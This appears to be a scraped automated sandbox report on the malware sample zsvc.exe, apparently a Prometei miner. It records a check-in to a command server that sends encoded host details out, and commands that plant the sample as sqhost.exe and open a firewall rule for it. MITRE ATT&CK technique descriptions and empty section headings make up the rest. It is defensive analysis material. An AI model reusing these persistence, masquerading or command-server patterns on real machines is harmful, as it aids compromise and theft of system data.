Mar 23, 2021 14:08:09.731378078 CET	1164	OUT	GET /cgi-bin/prometei.cgi?add=aW5mbyB7DQp2Mi43M0NfQU1ENjQNCjc2MDYzOQ0KDQo0eCBJbnRlbChSKSBDb3JlKFRNKTIgQ1BVIDY2MDAgQCAyLjQwIEdIeg0KDQoNClNGMURFUzlLQVMNCk5TT3V3IE9mDQoNCjEwLjAuMTcxMzQuMQ0KDQoNCjIwMjAwOTMwMDgwMjI5LjQ5MzE3Ny00MjANCk1pY3Jvc29mdCBXaW5kb3dzIDEwIFBybw0KfQ0K&h=computer&i=90Z405GXDA2Q5271&enckey=BtO0tzJv2apOB7qyzIW7zWStGW/UHBc4Xxf1Kg/hg-0ejQgNvvOI-nwRaXMjLhcvacc8U4MXZ7rGYP3FggtsNhWMcIqYeNGD/JknHi-IV66WOa6UuMMRKvZg2a3fLLQAOxVELNFmUML3ZKJUE7iUbF/IJ7fzTHFAPCETqP4WJyQ_ HTTP/1.0 Host: p1.feefreepool.net
Mar 23, 2021 14:08:22.899101973 CET	1294	IN	HTTP/1.1 200 OK Date: Tue, 23 Mar 2021 13:08:24 GMT Server: Apache/2.2.8 (Win32) mod_ssl/2.2.8 OpenSSL/0.9.8g PHP/5.2.6 Content-Length: 2 Connection: close Content-Type: text/html; charset=windows-1251 Data Raw: 6f 6b 0d 0a 43 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 0a 0a Data Ascii: okContent-type: text/html; charset=windows-1251

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: svchost.exe PID: 1720 Parent PID: 568

General

Start time:	14:07:47
Start date:	23/03/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Start time:	14:07:48
Start date:	23/03/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\cmd.exe' /C copy /y 'c:\users\user\desktop\zsvc.exe' C:\windows
Imagebase:	0x7ff77d8b0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Start time:	14:07:49
Start date:	23/03/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Start time:	14:07:50
Start date:	23/03/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\cmd.exe' /C netsh advfirewall firewall add rule name='Secure Socket Tunneling Protocol (HTTP)' dir=in action=allow program='c:\windows\sqhost.exe' enable=yes&netsh firewall add allowedprogram c:\windows\sqhost.exe 'Secure Socket Tunneling Protocol (HTTP)' ENABLE
Imagebase:	0x7ff77d8b0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Start time:	14:07:51
Start date:	23/03/2021
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh advfirewall firewall add rule name='Secure Socket Tunneling Protocol (HTTP)' dir=in action=allow program='c:\windows\sqhost.exe' enable=yes
Imagebase:	0x7ff6e2710000
File size:	92672 bytes
MD5 hash:	98CC37BBF363A38834253E22C80A8F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Start time:	14:07:52
Start date:	23/03/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\cmd.exe' /C ren C:\windows\zsvc.exe sqhost.exe
Imagebase:	0x7ff77d8b0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Start time:	14:07:53
Start date:	23/03/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\cmd.exe' cmd.exe /C sc start UPlugPlay
Imagebase:	0x7ff77d8b0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Start time:	14:07:54
Start date:	23/03/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\cmd.exe' cmd.exe /C sc start UPlugPlay
Imagebase:	0x7ff77d8b0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Start time:	14:07:56
Start date:	23/03/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Start time:	14:08:04
Start date:	23/03/2021
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic baseboard get product
Imagebase:	0x7ff796210000
File size:	521728 bytes
MD5 hash:	EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Start time:	14:08:06
Start date:	23/03/2021
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic baseboard get product
Imagebase:	0x7ff796210000
File size:	521728 bytes
MD5 hash:	EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Execution Coverage:	49.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	88.9%
Total number of Nodes:	9
Total number of Limit Nodes:	1

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report zsvc.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Bitcoin Miner:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN , ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre